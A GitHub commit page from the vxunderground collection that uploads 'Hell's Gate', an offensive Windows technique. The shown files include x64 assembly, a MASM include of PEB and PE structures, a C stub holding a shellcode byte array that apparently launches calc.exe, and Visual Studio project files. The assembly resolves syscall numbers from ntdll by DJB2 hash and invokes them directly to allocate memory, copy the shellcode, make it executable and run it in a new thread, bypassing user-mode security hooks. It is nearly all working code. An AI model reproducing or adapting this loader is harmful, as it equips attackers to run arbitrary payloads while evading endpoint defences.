Add files via upload

pull/1/head
vxunderground 2 years ago committed by GitHub
parent ad3ed5a13f
commit a6dbe47b59
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
  1. 262
      Hells Gate/Assembly Expansion/HELLSGATE.ASM
  2. 285
      Hells Gate/Assembly Expansion/HELLSGATE.INC
  3. 42
      Hells Gate/Assembly Expansion/main.c
  4. 31
      Hells Gate/C Implementation/HellsGate.sln
  5. 161
      Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
  6. 32
      Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj.filters
  7. 23
      Hells Gate/C Implementation/HellsGate/hellsgate.asm
  8. 211
      Hells Gate/C Implementation/HellsGate/main.c
  9. 337
      Hells Gate/C Implementation/HellsGate/structs.h
  10. 21
      Hells Gate/C Implementation/README.md
  11. 385
      Hells Gate/C# Implementation/Doxyfile
  12. 674
      Hells Gate/C# Implementation/LICENSE
  13. 11
      Hells Gate/C# Implementation/README.md
  14. 25
      Hells Gate/C# Implementation/SharpHellsGate.sln
  15. 278
      Hells Gate/C# Implementation/SharpHellsGate/HellsGate.cs
  16. 142
      Hells Gate/C# Implementation/SharpHellsGate/Module/MemoryUtil.cs
  17. 328
      Hells Gate/C# Implementation/SharpHellsGate/Module/SystemModule.cs
  18. 51
      Hells Gate/C# Implementation/SharpHellsGate/Program.cs
  19. 18
      Hells Gate/C# Implementation/SharpHellsGate/SharpHellsGate.csproj
  20. 128
      Hells Gate/C# Implementation/SharpHellsGate/Util.cs
  21. 93
      Hells Gate/C# Implementation/SharpHellsGate/Win32/DFunctions.cs
  22. 78
      Hells Gate/C# Implementation/SharpHellsGate/Win32/Macros.cs
  23. 128
      Hells Gate/C# Implementation/SharpHellsGate/Win32/Structures.cs
  24. BIN
      Hells Gate/HellsGate.pdf

@ -0,0 +1,262 @@
; @file HELLSGATE.ASM
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
include HELLSGATE.INC
_DATA segment
extern Shellcode: BYTE
extern ShellcodeLength: QWORD
wSystemCall DWORD 000h
lpAddress QWORD ?
sDataSize QWORD ?
OldProtect QWORD ?
hThreadHandle QWORD ?
VXTable VX_TABLE <>
Timeout LARGE_INTEGER <>
_DATA ends
_TEXT segment
SystemCall PROC
mov r10, rcx
syscall
ret
SystemCall ENDP
HellsGate PROC
_start:
mov r8, gs:[60h] ; Get process environment block (PEB)
cmp [r8].PEB.OSMajorVersion, 0Ah ;
jne _failure ; Jump if not Windows 10
; Get the base address of ntdll
mov r8, [r8].PEB.Ldr ;
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
mov r9, r8 ; Store for later use
; Get module export directory
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
jne _failure ;
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
add r8, rbx ;
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
jne _failure ;
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
add r8, rbx ;
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
jne _failure ;
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
mov r8, r9 ; ImageBase
add r8, rbx ; Module + RVA
; Push function hashes
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
xor r15, r15 ; Clean R15 register
mov r15b, 4h ; Move to R15 number of functions to find
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
mov r12, r9 ; Function name RVA
add r12, rbx ; ImageBase + RVA
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
mov r13, r9 ;
add r13, rbx ;
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
mov r14, r9 ;
add r14, rbx ;
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
dec ecx
;-----------------------------------------------------------------------------
; Find function ordinal index w/ function name hash
;-----------------------------------------------------------------------------
_parse_functions_name:
mov rbx, 4h ; sizeof(DWORD)
imul rbx, rcx ; siezof(DWORD) * RCX
mov esi, [r12 + rbx] ; Function RVA
add rsi, r9 ; Function RVA + ImageBase
mov r10d, 5381h ; hash = 0x5381
_djb2:
mov r11d, r10d ; Store original hash value for later
shl r10d, 5 ; hash << 5
add r10d, r11d ; (hash << 5) + hash
xor r11d, r11d ; Clean temporary hash value
mov r11b, byte ptr [rsi] ; Get ASCII char
add r10d, r11d ; ((hash << 5) + hash) + char
inc rsi ; Next string char
cmp byte ptr [rsi], 00h ; End of string
jne _djb2 ;
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
jz _get_function_address ;
loop _parse_functions_name ;
;-----------------------------------------------------------------------------
; Find the function address w/ function ordinal
;-----------------------------------------------------------------------------
_get_function_address:
mov rax, 2h ; sizeof(WORD)
imul rax, rcx ; sizeof(WORD) * RCX
mov ax, [r14 + rax] ; AX = function ordinal
imul rax, 4 ; sizeof(DWORD) * ordinal
mov eax, [r13 + rax] ; RVA of function
mov rbx, r9 ; RBX = ImageBase
add rbx, rax ; RBX = address of function
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
;-----------------------------------------------------------------------------
; Find the function system call w/ function address
;-----------------------------------------------------------------------------
_get_function_syscall:
inc rbx
cmp byte ptr [rbx], 00C3h ; Check if RET
je _failure ;
cmp word ptr [rbx], 050Fh ; Check if syscall
jne _get_function_syscall ;
sub rbx, 0Eh ; Address of system call
mov cx, word ptr [rbx] ; CX = system call
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
_reset_loop:
; Move to the next function
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
dec ecx ;
dec r15 ; Check if all function have been found
jnz _parse_functions_name ;
;-----------------------------------------------------------------------------
; Execute the payload
;-----------------------------------------------------------------------------
_payload:
; Initialise variables
mov r10, ShellcodeLength ;
mov sDataSize, r10 ; Store shellcode length
mov lpAddress, 0h ;
; Execute NtAllocateVirtualMemory
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
xor r8, r8 ; ZeroBits
lea r9, sDataSize ; RegionSize
mov qword ptr [rsp + 20h], 3000h ; AllocationType
mov qword ptr [rsp + 28h], 4 ; Protect
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Copy shellcode
cld ; Clear direction flag == forward copy
lea rsi, Shellcode ; Origin
mov rdi, lpAddress ; Destination
mov rcx, ShellcodeLength ; Size of shellcode
rep movsb ; Copy byte until RCX = 0
; Execute NtProtectVirtualMemory
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
lea r8, sDataSize ; NumberOfBytesToProtect
mov r9d, 20h ; NewAccessProtection
mov OldProtect, 00h ;
lea r11, OldProtect ;
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtCreateThreadEx
mov ax, VXTable.NtCreateThreadEx.wSystemCall
mov hThreadHandle, 0 ;
lea rcx, hThreadHandle ; hThread
mov rdx, 1FFFFFh ; DesiredAccess
xor r8, r8 ; ObjectAttributes
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
mov r10, lpAddress ;
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
mov qword ptr [rsp + 28h], 00h ; lpParameter
mov qword ptr [rsp + 30h], 00h ; Flags
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtWaitForSingleObject
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
mov rcx, hThreadHandle ; ObjectHandle
xor rdx, rdx ; Alertable
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
lea r8, Timeout ;
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
;-----------------------------------------------------------------------------
; Successfully execution of the function
;-----------------------------------------------------------------------------
_success:
mov rax, 1
ret
;-----------------------------------------------------------------------------
; In case something goes wrong
;-----------------------------------------------------------------------------
_failure:
xor rax, rax
ret
HellsGate ENDP
_TEXT ends
; end of file
end

@ -0,0 +1,285 @@
; @file HELLSGATE.INC
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
VXTableSize EQU SIZEOF VX_TABLE
VX_TABLE_ENTRY struct
pAddress QWORD ? ; 0x0000
dwHash DWORD ? ; 0x0008
wSystemCall WORD ? ; 0x000C
BYTE 2 dup(?) ; padding
VX_TABLE_ENTRY ends
VX_TABLE struct
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
VX_TABLE ends
LARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
LARGE_INTEGER ends
ULARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
ULARGE_INTEGER ends
UNICODE_STRING struct
_Length WORD ? ; 0x0000
MaximumLength WORD ? ; 0x0002
BYTE 4 dup(?) ; padding
Buffer QWORD ? ; 0x0008
UNICODE_STRING ends
LIST_ENTRY struct
Flink QWORD ? ; 0x0000
BLink QWORD ? ; 0x0008
LIST_ENTRY ends
PEB struct
InheritedAddressSpace BYTE ? ; 0x0000
ReadImageFileExecOptions BYTE ? ; 0x0001
BeingDebugged BYTE ? ; 0x0002
BitField BYTE ? ; 0x0003
Padding0 BYTE 4 dup(?) ; 0x0004
Mutant QWORD ? ; 0x0008
ImageBaseAddress QWORD ? ; 0x0010
Ldr QWORD ? ; 0x0018
ProcessParameters QWORD ? ; 0x0020
SubSystemData QWORD ? ; 0x0028
ProcessHeap QWORD ? ; 0x0030
FastPebLock QWORD ? ; 0x0038
AtlThunkSListPtr QWORD ? ; 0x0040
IFEOKey QWORD ? ; 0x0048
CrossProcessFlags DWORD ? ; 0x0050
Padding1 BYTE 4 dup(?) ; 0x0054
UserSharedInfoPtr QWORD ? ; 0x0058
SystemReserved DWORD ? ; 0x0060
AtlThunkSListPtr32 DWORD ? ; 0x0064
ApiSetMap QWORD ? ; 0x0068
TlsExpansionCounter DWORD ? ; 0x0070
Padding2 BYTE 4 dup(?) ; 0x0074
TlsBitmap QWORD ? ; 0x0078
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
SharedData QWORD ? ; 0x0090
ReadOnlyStaticServerData QWORD ? ; 0x0098
AnsiCodePageData QWORD ? ; 0x00A0
OemCodePageData QWORD ? ; 0x00A8
UnicodeCaseTableData QWORD ? ; 0x00B0
NumberOfProcessors DWORD ? ; 0x00B9
NtGlobalFlag DWORD ? ; 0x00BC
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
HeapSegmentReserve QWORD ? ; 0x00C8
HeapSegmentCommit QWORD ? ; 0x00D0
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
NumberOfHeaps DWORD ? ; 0x00E8
MaximumNumberOfHeaps DWORD ? ; 0x00EC
ProcessHeaps QWORD ? ; 0x00F0
GdiSharedHandleTable QWORD ? ; 0x00F8
ProcessStarterHelper QWORD ? ; 0x0100
GdiDCAttributeList DWORD ? ; 0x0108
Padding3 BYTE 4 dup(?) ; 0x010C
LoaderLock QWORD ? ; 0x0110
OSMajorVersion DWORD ? ; 0x0118
OSMinorVersion DWORD ? ; 0x011C
OSBuildNumber WORD ? ; 0x0120
OSCSDVersion WORD ? ; 0x0122
OSPlatformId DWORD ? ; 0x0124
ImageSubsystem DWORD ? ; 0x0128
ImageSubsystemMajorVersion DWORD ? ; 0x012C
ImageSubsystemMinorVersion DWORD ? ; 0x0130
Padding4 BYTE 4 dup(?) ; 0x0134
ActiveProcessAffinityMask QWORD ? ; 0x0138
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
PostProcessInitRoutine QWORD ? ; 0x0230
TlsExpansionBitmap QWORD ? ; 0x0238
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
SessionId DWORD ? ; 0x02C0
Padding5 BYTE 4 dup(?) ; 0x02C4
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
pShimData QWORD ? ; 0x02D8
AppCompatInfo QWORD ? ; 0x02E0
CSDVersion UNICODE_STRING <> ; 0x02E8
ActivationContextData QWORD ? ; 0x02F8
ProcessAssemblyStorageMap QWORD ? ; 0x0300
SystemDefaultActivationContextData QWORD ? ; 0x0308
SystemAssemblyStorageMap QWORD ? ; 0x0310
MinimumStackCommit QWORD ? ; 0x0318
SparePointers QWORD 4 dup(?) ; 0x0320
SpareUlongs DWORD 5 dup(?) ; 0x0340
BYTE 4 dup(?)
WerRegistrationData QWORD ? ; 0x0358
WerShipAssertPtr QWORD ? ; 0x0360
pUnused QWORD ? ; 0x0368
pImageHeaderHash QWORD ? ; 0x0370
TracingFlags DWORD ? ; 0x0378
Padding6 BYTE 4 dup(?) ; 0x037c
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
TppWorkerpListLock QWORD ? ; 0x0388
TppWorkerpList LIST_ENTRY <> ; 0x0390
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
TelemetryCoverageHeader QWORD ? ; 0x07A0
CloudFileFlags DWORD ? ; 0x07A8
CloudFileDiagFlags DWORD ? ; 0x07AC
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
LeapSecondData QWORD ? ; 0x07B8
LeapSecondFlags DWORD ? ; 0x07c0
NtGlobalFlag2 DWORD ? ; 0x07c4
PEB ends
PEB_LDR_DATA struct
_Length DWORD ? ; 0x0000
Initialized BYTE ? ; 0x0004
BYTE 3 dup(?) ; padding
SsHandle QWORD ? ; 0x0008
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
EntryInProgress QWORD ? ; 0x0040
ShutdownInProgress BYTE ? ; 0x0048
BYTE 7 dup(?) ; padding
ShutdownThreadId QWORD ? ; 0x0050
PEB_LDR_DATA ends
RTL_BALANCED_NODE struct
_Dummy BYTE 24 dup(?)
RTL_BALANCED_NODE ends
LDR_DATA_TABLE_ENTRY struct
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
DllBase QWORD ? ; 0x0030
EntryPoint QWORD ? ; 0x0038
SizeOfImage DWORD ? ; 0x0040
BYTE 4 dup(?) ; padding
FullDllName UNICODE_STRING <> ; 0x0048
BaseDllName UNICODE_STRING <> ; 0x0058
FlagGroup BYTE 4 dup(?) ; 0x0068
ObsoleteLoadCount WORD ? ; 0x006C
TlsIndex WORD ? ; 0x006E
HashLinks LIST_ENTRY <> ; 0x0070
TimeDateStamp DWORD ? ; 0x0080
BYTE 4 dup(?) ; padding
EntryPointActivationContext QWORD ? ; 0x0088
_Lock QWORD ? ; 0x0090
DdagNode QWORD ? ; 0x0098
NodeModuleLink LIST_ENTRY <> ; 0x00A0
LoadContext QWORD ? ; 0x00B0
ParentDllBase QWORD ? ; 0x00B8
SwitchBackContext QWORD ? ; 0x00C0
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
OriginalBase QWORD ? ; 0x00F8
LoadTime LARGE_INTEGER <> ; 0x0100
BaseNameHashValue DWORD ? ; 0x0108
LoadReason DWORD ? ; 0x010C
ImplicitPathOptions DWORD ? ; 0x0110
ReferenceCount DWORD ? ; 0x0114
DependentLoadFlags DWORD ? ; 0x0118
SigningLevel BYTE ? ; 0x011C
LDR_DATA_TABLE_ENTRY ends
IMAGE_DOS_HEADER struct
e_magic WORD ? ; 0x0000
e_cblp WORD ? ; 0x0002
e_cp WORD ? ; 0x0004
e_crlc WORD ? ; 0x0006
e_cparhdr WORD ? ; 0x0008
e_minalloc WORD ? ; 0x000A
e_maxalloc WORD ? ; 0x000C
e_ss WORD ? ; 0x000E
e_sp WORD ? ; 0x0010
e_csum WORD ? ; 0x0012
e_ip WORD ? ; 0x0014
e_cs WORD ? ; 0x0016
e_lfarlc WORD ? ; 0x0018
e_ovno WORD ? ; 0x001A
e_res WORD 4 dup(?) ; 0x001C
e_oemid WORD ? ; 0x0024
e_oeminfo WORD ? ; 0x0026
e_res2 WORD 10 dup(?) ; 0x0028
e_lfanew DWORD ? ; 0x003C
IMAGE_DOS_HEADER ends
IMAGE_FILE_HEADER struct
Machine WORD ? ; 0x0000
NumberOfSections WORD ? ; 0x0002
TimeDateStamp DWORD ? ; 0x0004
PointerToSymbolTable DWORD ? ; 0x0008
NumberOfSymbols DWORD ? ; 0x000c
SizeOfOptionalHeader WORD ? ; 0x0010
Characteristics WORD ? ; 0x0012
IMAGE_FILE_HEADER ends
IMAGE_DATA_DIRECTORY struct
VirtualAddress DWORD ? ; 0x0000
_Size DWORD ? ; 0x0004
IMAGE_DATA_DIRECTORY ends
IMAGE_OPTIONAL_HEADER64 struct
Magic WORD ? ; 0x0000
MajorLinkerVersion BYTE ? ; 0x0002
MinorLinkerVersion BYTE ? ; 0x0003
SizeOfCode DWORD ? ; 0x0004
SizeOfInitializedData DWORD ? ; 0x0008
SizeOfUninitializedData DWORD ? ; 0x000C
AddressOfEntryPoint DWORD ? ; 0x0010
BaseOfCode DWORD ? ; 0x0014
ImageBase QWORD ? ; 0x0018
SectionAlignment DWORD ? ; 0x0020
FileAlignment DWORD ? ; 0x0024
MajorOperatingSystemVersion WORD ? ; 0x0028
MinorOperatingSystemVersion WORD ? ; 0x002a
MajorImageVersion WORD ? ; 0x002C
MinorImageVersion WORD ? ; 0x002E
MajorSubsystemVersion WORD ? ; 0x0030
MinorSubsystemVersion WORD ? ; 0x0032
Win32VersionValue DWORD ? ; 0x0034
SizeOfImage DWORD ? ; 0x0038
SizeOfHeaders DWORD ? ; 0x003c
CheckSum DWORD ? ; 0x0040
Subsystem WORD ? ; 0x0044
DllCharacteristics WORD ? ; 0x0046
SizeOfStackReserve QWORD ? ; 0x0048
SizeOfStackCommit QWORD ? ; 0x0050
SizeOfHeapReserve QWORD ? ; 0x0058
SizeOfHeapCommit QWORD ? ; 0x0060
LoaderFlags DWORD ? ; 0x0068
NumberOfRvaAndSizes DWORD ? ; 0x006C
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
IMAGE_OPTIONAL_HEADER64 ends
IMAGE_NT_HEADERS64 struct
Signature DWORD ? ; 0x0000
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
IMAGE_NT_HEADERS64 ends
IMAGE_EXPORT_DIRECTORY struct
Characteristics DWORD ? ; 0x0000
TimeDateStamp DWORD ? ; 0x0004
MajorVersion WORD ? ; 0x0008
MinorVersion WORD ? ; 0x000A
_Name DWORD ? ; 0x000C
Base DWORD ? ; 0x0010
NumberOfFunctions DWORD ? ; 0x0014
NumberOfNames DWORD ? ; 0x0018
AddressOfFunctions DWORD ? ; 0x001C
AddressOfNames DWORD ? ; 0x0020
AddressOfNameOrdinals DWORD ? ; 0x0024
IMAGE_EXPORT_DIRECTORY ends

@ -0,0 +1,42 @@
/**
* @file main.c
* @data 07-08-2020
* @author Paul Laîné(@am0nsec)
* @version 1.0
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
* @details
* @link https ://ntamonsec.blogspot.com/
* @copyright This project has been released under the GNU Public License v3 license.
*/
#include <Windows.h>
unsigned char Shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
DWORD ShellcodeLength = sizeof(Shellcode);
extern BOOL HellsGate(void);
INT wmain() {
BOOL a = HellsGate();
}

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30114.105
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
EndGlobalSection
EndGlobal

@ -0,0 +1,161 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
<RootNamespace>HellsGate</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
